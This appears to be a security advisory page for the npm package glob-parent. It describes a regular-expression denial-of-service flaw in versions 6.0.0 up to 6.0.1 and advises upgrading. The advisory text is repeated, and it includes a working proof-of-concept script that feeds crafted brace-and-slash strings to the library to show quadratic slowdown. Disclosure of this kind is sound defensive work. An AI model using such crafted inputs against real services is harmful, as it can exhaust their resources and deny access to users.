Vulnerability	Vulnerable Version
M Regular Expression Denial of Service (ReDoS) glob-parent is a package that helps extracting the non-magic parent path from a glob string. Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). A ReDoS vulnerability exists in the `enclosure` regex. PoC const { performance } = require("perf_hooks") const globParent = require("glob-parent") const measure = fn => { let s = performance.now(); fn(); return performance.now() - s; }; for (const n of [5_000, 10_000, 20_000, 40_000, 80_000, 160_000]) { const input = "{" + "/".repeat(n); const time = measure(() => globParent(input)); // if the runtime is O(n^2), then this ration will be roughly constant const ration = time / (n * n); console.log(`${n}:\t${time}ms\t${ration.toExponential(3)}`); } How to fix Regular Expression Denial of Service (ReDoS)? Upgrade `glob-parent` to version 6.0.1 or higher.	>=6.0.0 <6.0.1

Regular Expression Denial of Service (ReDoS)

glob-parent is a package that helps extracting the non-magic parent path from a glob string.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). A ReDoS vulnerability exists in the enclosure regex.

PoC

const { performance } = require("perf_hooks")
const globParent = require("glob-parent")

const measure = fn => {
  let s = performance.now();
  fn();
  return performance.now() - s;
};

for (const n of [5_000, 10_000, 20_000, 40_000, 80_000, 160_000]) {
  const input = "{" + "/".repeat(n);
  const time = measure(() => globParent(input));

  // if the runtime is O(n^2), then this ration will be roughly constant
  const ration = time / (n * n);

  console.log(`${n}:\t${time}ms\t${ration.toExponential(3)}`);
}

How to fix Regular Expression Denial of Service (ReDoS)?

Upgrade glob-parent to version 6.0.1 or higher.

>=6.0.0 <6.0.1

Go back to all versions of this package